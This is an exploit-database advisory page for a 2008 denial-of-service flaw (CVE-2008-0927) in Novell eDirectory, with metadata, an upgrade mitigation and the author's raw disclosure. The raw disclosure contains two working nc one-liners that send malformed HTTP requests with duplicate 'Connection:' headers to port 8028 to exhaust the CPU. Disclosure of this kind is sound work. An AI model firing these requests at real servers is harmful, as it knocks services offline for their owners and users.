Novell eDirectory Denial of Service Vulnerability

vendor:

eDirectory

by:

Nicob

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: eDirectory

Affected Version From: < 8.7.3 SP 10

Affected Version To: < 8.8.2

Patch Exists: YES

Related CWE: CVE-2008-0927

CPE: Novell:eDirectory

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

Novell eDirectory Denial of Service Vulnerability

The dhost.exe process will consume 100% of a CPU. More than one request can be used to lock every CPU. Two 'Connection:' headers can be used to exploit this vulnerability, one with two values.

Mitigation:

Upgrade to Novell eDirectory 8.7.3 SP 10 or 8.8.2

Source

Exploit-DB raw data:

[=] Affected software :

	Editor : Novell
	Name : eDirectory
	Version : < 8.7.3 SP 10 and < 8.8.2
	Services : TCP/8028 (HTTP) and TCP/8030 (HTTPS)

[=] External references :

http://www.novell.com/support/viewContent.do?externalId=3829452&sliceId=1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0927

[=] Technical details :

The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.

Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection:
foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028 

One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo
"Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028

Nicob

# milw0rm.com [2008-05-05]